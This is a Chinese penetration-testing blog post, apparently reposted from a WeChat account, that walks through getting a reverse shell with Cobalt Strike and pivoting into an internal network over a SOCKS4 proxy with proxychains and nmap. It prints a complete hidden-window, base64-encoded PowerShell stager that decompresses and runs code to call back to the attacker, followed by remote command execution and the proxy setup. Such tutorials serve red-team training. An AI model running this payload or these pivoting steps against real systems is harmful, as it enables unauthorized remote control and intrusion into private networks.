内网代理篇(三) CobaltStrike代理

  • A+
所属分类:安全文章

声明:公众号文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!






本次所使用的攻击机为kali linux系统,攻击过程中涉及到的工具主要有:proxychains,nmap等。攻击的拓扑结构如下图所示。


内网代理篇(三) CobaltStrike代理



01

反弹Shell 

首先启动CobaltStrike的服务端,并执行命令如下所示:
>>> ./teamserver 192.168.43.137 xxxxxx
启动Cobaltstrike的客户端,并填写运行服务端的ip地址,端口号,用户名,及在服务端设置的密码口令。


内网代理篇(三) CobaltStrike代理


进入CobaltStrike客户端控制面板以后,依次点击Attacks>Payload Generator选项,设置监听以及生成payload。


内网代理篇(三) CobaltStrike代理


点击Add选项后,设置监听方式及监听的端口号,输出方式选择Powershell Command。


内网代理篇(三) CobaltStrike代理


如下为生成的powershell形式的payload。


内网代理篇(三) CobaltStrike代理


将复制的payload在目标服务器主机上执行,如下所示:
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADQAKwBpAFMAaAByACsAMwBQADAAcgArAE4AQwBKAEcAbQAwAEgAOABkAGEAZQB6AFMAUQBIAEIAUgBSAEUAUgBQAEcARwBmAFQAcQBkAEUAawBwAEYAdQBSAFkARgBnAG0AZgBuAHYAMgArAEIAMgB0ADIAegAwADcAMAA3AHkAYQA2AEoAbwBRAHIAZQB5ADEAUABQAGUANgBsAFgAZwAvAGgAUgB3ADgAZwB5ADgATQBnAHoASQBmAFcANABnAEMAaQAwAFAASgBkAGkANwB1ACsAMwBrAFcAdgBnAGIASgAwAHQAWABuAGMAUQB2AC8AcgBJAE0AMQA2AEIAYQBTAEkAWQBoAHQAVABmADkAMwBjAHEAUQBNAEMAaABpAGcAOAB4AFEASwArAE8AWgAwAFkAMgByAEYARAA1AEoAaABPAEUAWgBvAFIAZwA2AGUANwB1AC8AaQA1AC8ARgBiAGsAaAAyAE0ASgBYAEYAMgBBAHIAaABxADgATwB4AEgAdgBQAEQASwBuAHYAVgBQAEcAWgA5AFgAMwBPAGMANABEAGwAdgB2AHoAeABSAHkAOQBDAEMATAByADQAcwBxAC8AMgBJAFcAYgBEAEUARABvAGIAMgA0AEoAaABzAFUAVAA5AGsAMQByAHUASQBZAEsAUAA0ADgAMABCAEcAcABqADYAbQAzAHAANAByAGYAWgB0AGIAdwBQAHMAcQAxAGoAYQBBADgAYQBlAG4ASQBKADEAegBlAHkAYgA3AEIAawBnAE8AMABGAFYAOAAyADAATABGAHcAdAAvAC8AVgBVAG8AUABUAC8AVwBYAHEAcAA4AEUAQQBFADcATABCAGEAMABOAE0AVABRAHEAWgBxADIAWABTAGgAUgBQADAAcQBaAHcAMQBuAHEAdwAyAEoAaABaAEIAbgBJAEMANwAwAHQAcgBpADQAdAB0ADgANQBVADUAegBsADYASgBRAGMALwB1AG0AQQB2AGwASwA0AG4AMgAvAG0AQQBuAE8AUAByAFEAMgBaAFcATAB6AHIARgBBAGwAbQBxAGgAQgB2ADIAdwBtAEcAaABRAGoAMQBuAC8AcAA1AGYAWABxAGcALwAzADkAQgBNAEkAeABkAGIARABxAHkASwBMAG8AYgBJADgAegBXAEkAWQBzAHUAQQBZAFgAVQBBAFgATgBPAEcAVQA3AGcAbABhAG8AVwBRAHgATQB6AGQARgBVAG8ARQBCAEkASQA0AFEAaQA1ADEAdwAwAEwAMABZAHUAOABJAGkAdwA5AHUAWgBOAHMAVgBZAHYAZgA1AGQAKwAyACsARgBCAFYANAB1AHAASAA3AHUAMAByAEYAagAwAHAARQBTAHMAVwBvAFYATABuAG0AeABPAC8AUQBNAGMAcgB6ADUAbQBLAE8ASABPAGMAWAA5AEIAKwBTAHEAMABSACsAdgB5AFIAWQA2AGYANwBIAFoANgBsAHEAUQBoAHYAdQBBAEkAYQB2AG0AUABEADcASQBWAGYAdgA3ACsANgBlADgAeQBVAGsANQB5AG0AcQBYAG0AagBsAGUAdAA4AHAAdQBrAEsATgBDAEEAaQBBAFAAWgBSAG0ANABaAHkAaABDAEoAWgBlADMAdQBOAHoAYwBYAHYAVABEAEMAdABmAEcAcQByAGQAdABLADQANgBsAC8AQgBjAGMASAB5AG4AbgBoAGUAZQBaAGIANwBjADMANQBYAHUAcgA5AG0AVAB2AFgALwBkAFIASgBaAHQAUQBwAFIAOQAvADcAbwBhAE8ATABpADEAWABNAGkAbABMAG4AQQBzADQANQBiAHcAeABjADkAaQBCAHIAYwAyAHoAUABtAG8AMwBzAFEAVQBnAHIATgBZAHUASAA2AEEASgBuAGQAbABwADUAQQBSACsAdgB5AHIARwB1ADkAWQArAEUAMgAzAGUAdwBIAEgARwBpAFQAdQBJAFUARgBGAFUAcQBMADAATQA1AGgATABEAEkAcwBGADAAUgAxAEIAaAAvAEIAMwAyAFoATQAwAGYAZABpAFMATQBvAE0AMwA2AFcAdABwAHAAVABmAHYAMgBUADcATAA1AFoANABOAHcAcgBCAEMAcQBSAEcAcABjADYATgBDAGEAUgBEAFkAMABLAHgAUQByAEIAdABhADEAMAA5AHMAaABMADEAOABXAFgAaQBIAE8ANABwAHMAYgBCAGsAZwB4AEQAZAB6AEwANgBWAFAASwBMADIANgA3AG4AawB1AHEAWgBqAEkASQBOAEUAbABOAE0AdwAwAEgAeABvAFcAcwBEAE4AVwBLAHQAVABBAE0AbQBFADMAMQBhAHoAZABEAFUATABoAFUAMAA1ADYAdwBMAFoASgB5AFIARgBMAE0AWQBrAEoAZQBaAE4AeABvAGUARQBzAFoANQBCAFoAKwBmAGYAOABLAEYAVQAxAGkARQBYAEgAdAA2AEYARABwAFAATQB1AEoATgBoAGcAUgAzAHIATwB0AGEATAB5AGQAQQBNADcAYQBCAGIAKwBBACsAeABiAG4AVgB5AEsASQB1AFAAcQBSAHQASQBIADAAQwBRAEIATgBOAHYARABGAFcAcABoAEkAVQB6ADYAVwBxAEgAeQBTACsATAA5AGIALwBCACsAYgBqAEUALwB3AGUAdwBoAGUAQQAxAGsATQBTADkARQBjAFUAcwBhACsAcQBVAEwARQBIAFoAQwA2ADAAeQBhAE0AUQB5AG8AcAAxAEoAVwBnAHMALwBkAEYARwBlADEAbABKAHMAeABzAHUAdgBtACsAeAB2AFIATwBhADAASQBFAHkAVQBCAGUAVQA0AFgAaABMAEQAVgAwAFAASQBlAFYAeQB6AFUAbQBXAGkAWABkAEYAUwA1AGwAWQA0AE8ASQBpAE8AbAB1AHEAcwBrAGgAcgB0AEEAZgBDAHoAMABRAFcAdQBmAFQASgBqAEkATQAyAFkAWQBCAFEATwBlAEkALwB1AHAAdwBZAFMAaAAzAGIAZgA5AHoAVgA0AE8AUQBDAEkAZgBEAGsAbQBuAHQAMABwADUAbABXAFYAawBxADIAVQAxAEwAVABHAFMAdQAyAGQAWABzAEEAeQBIADYARQAzAEcAbgBqADcAdABJAEQARgBXAEIATQA4AE8AMgA4AE8AZQBzAEoAdwBEADYAeABEAGsAdgBpAEsAbgBVAFQATgA1AGsATQBwAG4AbwA3AFYASABZAHcAWgA2ACsAawBrAEoAeABGAGgAbAB6AFcAVgBzAHQASgB5AGgASgA3AFEAdwAwAFYAMQBFAGYATwBRAGoAUABoAHEAcgBlAGkAUQBIAHMAaQBOAGEAagBYADMATQBMAGIAQQBVAGkALwAyAG4AdwBaAEQAUgB3AFoATwA5AGEAYwBOAGMAMwB3AHcAeQBYADMAcQB3AGkAMABHADIAUAAzAGUAeQB2AFIAWAAwAEkATQByADgANgBJAFIAOQBXAEsAKwAxADQARgBKAHEANgA2ADUAdgB3AFcAVwAwAE8ANQA4AFUAeQB6AEQAUABIAEcAUQBrADgAagA3AHkAUgBvAFkAZgAxAHAAVwB6AHMAVAAwAGUARAA4AEMAdgB6AGIAVgBqAGIAVABpAGIAcgAxAGUARQBtAHgAbwBJAGsATABCAHAASQBVADMAMwA3AFgAagBCAHoAbwA5ADEAZABZADEAeQBiAEwARgBBAE0AQwBvAFoAVABzAHQAZwBwAEwAUAB1AEgAOQBmAG0ASQB1AEQAcgA2AGsAYQBjAEQAMgB3AFUAUgBKAEwAbABOAE0ATwB1AG0ARgA1AGwASABDAG4AVgB0AEMANQA1AEQAdABmAG0ATQBIAGgAcQBtAG0AYwBtAEgAZgBnAE4AMABFAEkAVwA0AFQAUQBoAGYAdABvAFoAdgA4AFkAOABQAEkAagBMAHMAVwB1AHMAQgBNAHMAeAA5AGcAdwAzAFAAUgBnAGQASgB3AHEAYQBCAEgAZABqAG8ARQBqAEQAVgBZAEkAQwBMAEsARQBnAHQAbwBQAG0AVwBEAFUAeQAzAEwAbABlAEoAagA5AHAAMgBPAE0AYQBrAFEAOAAyAEIAMwBrAEkAeQBxAEkAMQBPAG8ARABPAE8AWgBTAEgATQBNADcAVwBxAGMAbwBOAGsAMQBRADgAaQBFADkAUgBOADkAUABqACsAdABKAE8AbQA1ADgATwBOAEUAKwBmADUATgA1AHUAYQA0AFMAUgBJAEkAdwA5ACsAVgBzAFQAUwBMAHcAeQBtAHQARQBLAHEANQBjAFYAdgBXAE0AUABEAEoAUwBlAFcASAAyAHEAbQB5AEoAcwAwAGsAbwBYAGEAZQBPAHcAbgB0AEMAZQB0ADkAUgBYAGQAbwBpAE4AdwBXAFEARwBKAHUAWQBaAE0ARwBQAFoANgA4AGoAVwBXAHMARgBEAGYAbABYAGYAMQBkAEIAUwBsAGoAUQByAEcASwBjAEsATQArAGYAWABVADgANgBSACsATwBtAHgAdAB1AHAAUABsAEcAZwBtADIATQBNAFoAMwBlAGwAeABYAFYAMwBoAFQAeQBOADUAdwBpAGYAagBPAFMAMgB0AHQASwBPAGcAVAB2AGMANwBiAHUATgAyAGcALwBWAHUAcABQAEUAbgBlAHQAWgBuAEYAWgByAEUAWgBEAEEAVABwAGgATwBXAHEAZABYAFoAWgBLADcAdwAwAHgAMQBuADkAaABOAGEAbQBCAG8ANgBXAHoAZQBuADIAdABIAHMAegB4AGIARwBTAEoAagBrADgAdgB0AE4AMwAzAGYANgArADcAMgB6AFcAYQAxAFAAUABhAHYAaABpADYAZgBwAFMAZgBLADcAdgBMAGcATABvADIANQA1AHQAMQBhADQAaABjAEwAWgBxADQAawByADcASgBsAEQAMwBEADYAcABtAHEAZAAyAE8ATgBSAFMAegAvAFoAeAByAFoAWgBwAHgAdQAxAGcANgBhAEIATgBsAFQATABmAFYAagB3AG0ATwBTAFAAdgBaAEQAYQBDAHQASgA3AE0AaABtAGMAdwBTADIAYwBIAHYATwBWAEMAdABVAFkAMwBXAHoAbwB6AGwANQBVAFQAbAA5AFMANwBRAG4ATwA1AGwAWAB1AGUAMwBtAHkAZQBZADgAWQBvAG0AeAAxADIATABXADIAVABPAEoARABNAGEAZABJAG8AZgA0AHYAcgAzAGYAQQAwAEUATgBkAGUAbwB2AEoATgBWAFcAbABLADcARgBZAGEATgAvAHEAbQB2AHAAVgAyAHIAdQBRAHgATQA0AEkAVQAxAHoAcgBiAGMASABqAGkAYQBzAEoAaQBOAFAAWAA4AG0AdQBvAE8ARwB1AHUAbQB2ADIAOABtAHMASQAzAFMAcwBJADQARwB6AG0ANQB4AGwARwBsAGwAdgB6ADEAQQBqADMAYQA2AFAAcQBRAFAAdQBLAFYAeQBZAEQAcQBTADAAQwBSAEsAcwBRADYAZABTAFcAMgBoAHIAcgA2AEoANgBVAEMAYwBKAFAAeQBXAGQAWgB6AGgAeABnAGcAWABXAGsAdQBkAEwAZABwAEQATQBKAEEAUwBIAEUAMgBqAHAANABQAHUAMQAyAGUAMgBKADkAUQB1AE8AUgAyAHMAUwBhADYAUwBHAGgAMQB1AHgASABOAFcAcQAwAE8AZwA1AHoAVQA3AFgATQBPAEcAZQBVAHIAdwBtAFEASAB0ADcAcwBuAG8AUgAwAEYAQwAvAGoAVABKAHkAZgBLAFMAeQBKADQAeQBtAFMAQgBnAFMARgA2AFAATgBzAHYAZwBSAFAASQBhAHQARABpAFgAYgBXADAATwBpACsAWgBDAEMASABwAFQASgBFAFkAOQBVAHYAYwBiAEcAdABaAHgARwA2AFQANgBRAFMAUgAyAGoAVABJAG4AeAAwAHIAYgBxAEgAZABGAHcARQA5AG8AVABaAGkARwBpAHAAQwB3AEMAcgA5AG4ANQB5AEsAZABTAGsAYgBFAGYAcwA5AGIANQBkAFoARABaAFAAcABKAHMAbwBuAGkASAB4AFIANQBQAHQAcQBZAGUAbQB0ADQAcABNADIAUgA5AHAAcQA5AEwANQBmAHoAbABuAGoAMwA5AHUAbgA1AEkAWABtADUAagBaAEYAdgArADgAZABOAFEAcwB6AFYAbQAvAGQAMwBQADIANwB6AFEAZwB3ACsAZABNADIAdgBwAHIATQBSAFEATwBFAGUAMgBLAFMAYgBrAGcAbgByAGQAagA4AEsASABoAEsAdQBjADUATABxAFcAWgBsAEcAcwBmAGoANQBhAEgAKwBFAHkASQBVADIARwBYAHYASgBZAEgAeQA3AFYAVgBqAGIAOQBvAHgAcwBzAHYAdABpAHgAUAByAHoAcgBlACsAVAAyADMATgBPAGwAbgBYAG0AMAAxAFgAcAAvAFkASQBvAGwAVwA1AFgAMwB5AGIAYQBiAHYAUAB4ADUAMwByAEUAMgB4AFQANABmAHAAVwBzAHkAZgBrAHEASAA0AGkAVQBvAGIAdgBEACsAdwBwAEYASgAzAFcAYQBwAHIATgBuAGcAeQBiAFcAZgBwACsAWQBuAHUAZQBuAHgAVABkADcAbABXAHoAKwArAHcARABsAG8AeQBzADcAZAAvAFUAMgBzAEsASABJAGQAZQBEAC8ATQBRAFkALwBlAGYAMwB2ADcARwBiADgANQBUAFAAawBPADMAcwA1AG8AcwA4AHAAeQB5ADcAbABmAHcARwB4ADMAMQBUAGcANAB3ADAAQQBBAEEAPQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA


内网代理篇(三) CobaltStrike代理


执行结束后,成功反弹目标主机的交互式shell。此处可以执行sleep 0设置与目标交互的时间周期。执行shell whoami命令,可对目标主机执行远程命令。


内网代理篇(三) CobaltStrike代理



02

添加sock4代理 

在获得了基础的交互shell以后,选择该beacon右键,依次点击Pivoting->SOCKS Server选项,并设定相应的端口号,此处系统默认的端口号为23612。


内网代理篇(三) CobaltStrike代理


内网代理篇(三) CobaltStrike代理


内网代理篇(三) CobaltStrike代理


通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.237.129的web应用,相关配置如下所示:


内网代理篇(三) CobaltStrike代理



我们也可以应用 proxychains 工具,进行内网探测,使用编辑器在文件件/etc/proxychains.conf 的最后一行加入 socks4 代理的配置信息。


--- snippet --- [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks4 127.0.0.1 23612


通过执行代理工具 proxychains,对内网主机 ip 地址为192.168.237.127进行端口探测。执行指令如下所示:
>>> proxychains nmap -sT -Pn 192.168.237.129

内网代理篇(三) CobaltStrike代理




- 往期推荐 -



内网渗透-代理篇(一)








内网代理篇(二):MSF代理

【推荐书籍】


文章总结




希望对大家有所帮助内网代理篇(三) CobaltStrike代理内网代理篇(三) CobaltStrike代理

内网代理篇(三) CobaltStrike代理

走过路过的大佬们留个关注再走呗内网代理篇(三) CobaltStrike代理

内网代理篇(三) CobaltStrike代理

内网代理篇(三) CobaltStrike代理  如果对你有所帮助,点个分享、赞、在看呗!内网代理篇(三) CobaltStrike代理



本文始发于微信公众号(渗透Xiao白帽):内网代理篇(三) CobaltStrike代理

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: